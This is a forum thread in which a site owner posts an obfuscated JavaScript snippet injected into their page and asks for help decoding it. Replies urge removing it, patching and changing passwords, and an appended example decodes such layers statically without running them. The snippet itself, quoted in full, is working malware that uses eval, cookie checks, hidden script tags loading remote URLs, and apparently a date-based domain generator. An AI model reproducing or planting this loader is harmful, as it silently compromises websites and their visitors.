Possible Javascript Threat

#1 pretino, 11-09-09, 07:04 AM

Can you please help me decode the following JavaScript?
What does it actually do?
HTML Code:
<script language="javascript">$a="Z63cZ3dZ22ds.leZ256eZ2567tZ2568;i+Z252b)Z257btmpZ253dds.Z2573licZ2565(i,Z2569Z252b1)Z22;stZ3dZ22Z2573Z2574Z253dZ2522$Z2561Z253dsZ2574;Z2564cZ2573(Z2564aZ252bZ2564Z2562+Z2564cZ252bdZ2564Z252bZ2564eZ252c1Z2530Z2529;Z2564Z2577(Z2573tZ2529Z253bsZ2574Z253d$aZ253bZ2522;Z22;cbZ3dZ22apZ2565Z2528dZ2573Z2529;Z2573tZ253dtmZ2570Z253dZ2527Z2527;for(iZ253d0;Z2569Z253cZ22;dbZ3dZ229+tqduZ3ecudTqdu8tqduZ3ewudTqdu890Z3d0#9+0dy}uK7iuqb7M0-0tqduZ3ewudVe||Iuqb89+dy}uK7}Z257F~dx7M0-0tqduZ3ewud]Z257F~dx89;!+dy}uK7tqi7M0-0tqduZ3ewudTqdu89+yv08tqduZ3ewudTqi890--0!0ll0tqduZ3ewudTqi890--0Z25260ll0tqduZ3ewudTqi890--0$9ktqduZ3ecudTqdu8tqduZ3ewudTqdu890Z3d0!9+0dy}uK7tqi7M0-0tqduZ3ewudTqdu89+0dy}uK7}Z257F~dx7M0-0tqduZ3ewud]Z257F~dx89;!+0dy}uK7iuqb7M0-0tqduZ3ewudVe||Iuqb89+0m0tqduZ3ecudTqdu8tqduZ3ewudTqdu890;Z22;dcZ3dZ220!9+0yv08tqduZ3ewud]Z257F~dx89;!0,0!Z25209kcxyvdY~tuh0-0dy}uK7iuqb7M0;07Z3dZ252070;08tqduZ3ewud]Z257F~dx89;!90+mu|cukcxyvdY~tuh0-0dy}uK7iuqb7M0;07Z3d70;08tqduZ3ewud]Z257F~dx89;!9+myv08tqduZ3ewudTqdu890;!0,0!Z25209kcxyvdY~tuh0-cxyvdY~tuh0;07Z3dZ252070;0tqduZ3ewudTqdu89+mu|cukcxyvdY~tuh0-0cxyvdY~tuh0;07Z3d70;0tqduZ3ewudTqdu89+mcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKcxyvdY~tuhMKZ2520MZ3eaeubiZ3esxqbSZ257FtuQd8!9+ve~sdyZ257F~0SZ22;opZ3dZ22Z2524aZ253dZ2522dw(Z2564cs(Z2563u,Z25314Z2529Z2529;Z2522;Z22;cuZ3dZ22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rvwyr}f:wZ7by;xp;ubZ7bfdZ25;64c}p`|)Z25$$4|q}s|`),$*(;}rfuyq*(;p}b*Z22;dzZ3dZ22Z2566unZ2563tZ2569on 
Z2564wZ2528t)Z257bcZ2561Z253dZ2527Z252564Z25256fcuZ256dZ252565nt.Z252577riZ2574Z25256Z2535Z252528Z252522Z2527;ceZ253dZ2527Z252522)Z2527;cbZ253dZ2527Z25253cscrZ25256Z2539pZ2574Z252520Z256cZ2561Z25256eZ2567uZ252561Z2567Z252565Z25253dZ25255cZ252522jaZ2576Z252561Z252573Z2563Z252572Z252569pZ25257Z2534Z25255Z2563Z252522Z25253eZ2527;ccZ253dZ2527Z25253cZ25255cZ25252fscriZ2570Z252574Z25253eZ2527;eZ2576alZ2528uZ256eesZ2563apeZ2528t))Z257d;Z22;deZ3dZ22iuqbSxZ25220-0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0#90;0~e}9050!Z25209M0;0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0$90;0~e}9050!Z25209M+}Z257F~dxSx0-0|uddubcK88dy}uK7}Z257F~dx7M0;0~e}9050Z2522Z259M0;0|uddubcK88dy}uK7}Z257F~dx7M0:0~e}9050Z2522Z259M+tqiSx0-0|uddubcK88dy}uK7tqi7M0:0Z25269050Z2522Z279M+4q-4qZ3ebu`|qsu8tZ3ciuqbSxZ25220;0}Z257F~dxSx0;0iuqbSx!0;0tqiSx0;0}Z257F~dxcKdy}uK7}Z257F~dx7M0Z3d0!M0;07Z3esZ257F}79+Z22;ddZ3dZ22q|se|qdu]qwys^e}rub8tqiZ3c0}Z257F~dxZ3c0iuqbZ3c0y~tuh9kbudeb~0888iuqb0;08y~tuh0:0tqi990;08}Z257F~dx0N0tqi90:0y~tuh90;0tqi9+mfqb0iuqbSx!Z3c0iuqbSxZ2522Z3c0}Z257F~dxSxZ3c0tqiSxZ3c0}qwys^e}+~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7MZ3c0dy}uK7}Z257F~dx7MZ3c0dy}uK7iuqb7MZ3c0cxyvdY~tuh9+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90;0~e}9050Z2526#9050Z2522Z2526M0;0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90,,0Z252290;0~e}9050Z2522Z25M+Z22;ceZ3dZ22Z2563harZ2543oZ2564Z2565At(Z2530)Z255e(Z25270Z257800Z2527+esZ2529))Z253bZ257d}Z22;cdZ3dZ22;Z2573tZ253dZ2573Z2574+Z2553triZ256eg.fZ2572omCZ2568arCZ256fdZ2565((Z2574mp.Z22;czZ3dZ22Z2566Z2575Z256ectiZ256fn cZ257aZ2528cZ257a)Z257brZ2565tuZ2572n 
Z2563aZ252bZ2563Z2562+Z2563c+cZ2564+cZ2565Z252bcz;Z257dZ253bZ22;daZ3dZ22fqb0t-7vrs}vybZ3esZ257F}7+0fqb0cxyvdY~tuh0-0Z2520+fqb0}Z257F~dxc0-0~ug0Qbbqi87e~Z257F7Z3c07tfu7Z3c07dxb7Z3c07vyb7Z3c07fyv7Z3c07huc7Z3c07fuc7Z3c07wxd7Z3c07u~y7Z3c07ud~7Z3c07|uf7Z3c07dgu79+fqb0|uddubc0-0~ug0Qbbqi87q7Z3c7r7Z3c7s7Z3c7t7Z3c7u7Z3c7v7Z3c7w7Z3c7x7Z3c7y7Z3c7z7Z3c7Z7b7Z3c7|7Z3c7}7Z3c7~7Z3c7Z257F7Z3c7`7Z3c7a7Z3c7b7Z3c7c7Z3c7d7Z3c7e7Z3c7f7Z3c7g7Z3c7h7Z3c7i7Z3c7j79+fqb0~e}rubc0-0~ug0Qbbqi8!Z3cZ2522Z3c#Z3c$Z3cZ25Z3cZ2526Z3cZ27Z3c(Z3c)9+fqb0dy}u0-0~ug0Qbbqi89+fqb0tqdu0-0~ug0Tqdu8Z22;caZ3dZ22Z2566uZ256ecZ2574ioZ256eZ2520Z2564cZ2573(dsZ252cZ2565sZ2529Z257bdsZ253dunesZ2563Z22;Z69fZ20(doZ63umZ65ntZ2eZ63oZ6fZ6bieZ2einZ64exZ4fZ66(Z27rfZ35f6Z64Z73Z27)Z3dZ3d-1)Z7bfuncZ74ioZ6e cZ61llZ62aZ63k(Z78)Z7b wiZ6edowZ2etw Z3dZ20xZ3bZ73Z63(Z27rf5fZ36dZ73Z27,2,7)Z3beZ76al(Z75nZ65scaZ70e(dZ7a+Z63Z7a+opZ2bsZ74)Z2bZ27Z64wZ28dzZ2bZ63z(Z24aZ2bsZ74)Z29Z3bZ27);Z64oZ63umeZ6eZ74Z2ewZ72Z69Z74eZ28Z24a);Z7ddZ6fZ63Z75mZ65ntZ2ewriZ74e(Z22Z3cimg sZ72cZ3dZ27http:Z2fZ2fsearcZ68.Z74witZ74erZ2ecoZ6dZ2fimageZ73Z2fsearcZ68Z2frss.pZ6egZ27 widtZ68Z3d1 hZ65Z69gZ68tZ3d1 Z73tyZ6ceZ3dZ27visibiZ6cityZ3ahidZ64eZ6eZ27 Z2fZ3e Z3cscZ72Z22+Z22ipt lZ61nguZ61geZ3djaZ76aZ73crZ69ptZ22+Z22 srcZ3dZ27hZ74tZ70:Z2fZ2fseZ61rchZ2eZ74wiZ74tZ65r.Z63Z6fZ6dZ2ftrendsZ2fZ77Z65Z65kZ6cZ79.jZ73Z6fnZ3fcalZ6cbaZ63Z6bZ3dcallbZ61ck&Z65xZ63ludZ65Z3dZ68asZ68tagZ73Z27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22iptZ3eZ22);}elseZ7b$aZ3dZ27Z27};fuZ6ectiZ6fn sZ63Z28cnmZ2cv,Z65d)Z7bvZ61Z72Z20exZ64Z3dnew DZ61Z74Z65();Z65Z78Z64Z2esZ65tDaZ74Z65(eZ78Z64.gZ65tDaZ74Z65()Z2bedZ29;Z64oZ63uZ6dZ65ntZ2eZ63oZ6fkieZ3dcnmZ2bZ20Z27Z3dZ27 +escape(Z76)+Z27Z3bZ65Z78Z70irZ65sZ3dZ27+exdZ2etZ6fGMTZ53Z74rZ69nZ67Z28)Z3bZ7d;";function z(s){r="";for(i=0;i<s.length;i++){if(s.charAt(i)=="Z"){s1="%"}else{s1=s.charAt(i)}r=r+s1;}return unescape(r);}eval(z($a));</script></body>
Thanks

Last edited by pretino; 11-09-09 at 07:08 AM.

#2 wirehopper, 11-09-09, 07:07 AM
Don't bother decoding it.

Get it off your server.

Check the server carefully for other instances. Upgrade any software - like blogs. Change all your passwords. Run a deep scan on your PC for viruses and malware.

#3 pretino, 11-09-09, 07:09 AM
ok, but I want to decode it!!!!

#4 End User, 11-09-09, 09:12 AM
Quote (originally posted by pretino):
ok, but I want to decode it!!!!

You can decode it all you want, but follow wirehopper's advice first: get rid of it as quickly as you can.

Right now you have no idea what it's doing - it may be sending spam, attacking other sites, serving up malware and/or child porn... it could be doing any or all of the above. Get rid of it first, then decode it.
__________________
I don't live on the edge, but sometimes I go there to visit.

#5 wirehopper, 11-09-09, 07:18 AM
You can use PHP's eval statement to decode it.

It probably redirects to a server other than yours, or it may be attacking another server.

#6 Nico, 11-09-09, 09:39 AM
I tried to decode it by replacing eval() with document.write(), and AVG recognizes it as a virus and won't even let me open the file.
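
A static way to peel the percent-encoding layers of a loader like the one in post #1 without ever running it, given here as an added example that is not part of the original thread. The function names and the `SAMPLE` string are constructed for illustration; run it with Node.js on a copy of the script saved as text, not in a browser.

```javascript
// Added example: static decoding only; nothing from the sample is ever executed.

// One pass of percent-decoding (%XX and %uXXXX), like unescape(), but malformed
// sequences are left untouched instead of throwing.
function percentDecodeOnce(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g,
    (_, u, b) => String.fromCharCode(parseInt(u || b, 16)));
}

// Same transformation as the z() helper in the posted script: "Z" -> "%", then decode.
function decodeZLayer(s) {
  return percentDecodeOnce(s.replace(/Z/g, '%'));
}

// Peel nested percent-encoding, keeping every intermediate layer for review.
// Stops when a pass changes nothing or after maxLayers passes.
function peelLayers(encoded, maxLayers = 5) {
  const layers = [decodeZLayer(encoded)];
  while (layers.length < maxLayers) {
    const prev = layers[layers.length - 1];
    const next = percentDecodeOnce(prev);
    if (next === prev) break;
    layers.push(next);
  }
  return layers;
}

// Triage: name the constructs in decoded text that deserve a closer look.
function flagIndicators(text) {
  const rules = {
    eval: /\beval\s*\(/,
    unescape: /\bunescape\s*\(/,
    documentWrite: /document\.write\s*\(/,
    cookieAccess: /document\.cookie/,
    scriptTag: /<\s*script/i,
    externalUrl: /https?:\/\/[^\s'"<>]+/,
  };
  return Object.keys(rules).filter((name) => rules[name].test(text));
}

// Constructed sample in the same "Z" scheme (not the payload from the post).
const SAMPLE = 'cZ3dZ22aZ2562cZ22;eZ76al(uZ6eescape(c));';

const layers = peelLayers(SAMPLE);
layers.forEach((layer, i) => console.log(`layer ${i + 1}: ${layer}`));
console.log('indicators:', flagIndicators(layers[layers.length - 1]).join(', '));
```

Only percent-encoding is handled here; any strings a script transforms by other means stay encoded after these passes and need their own static decoder.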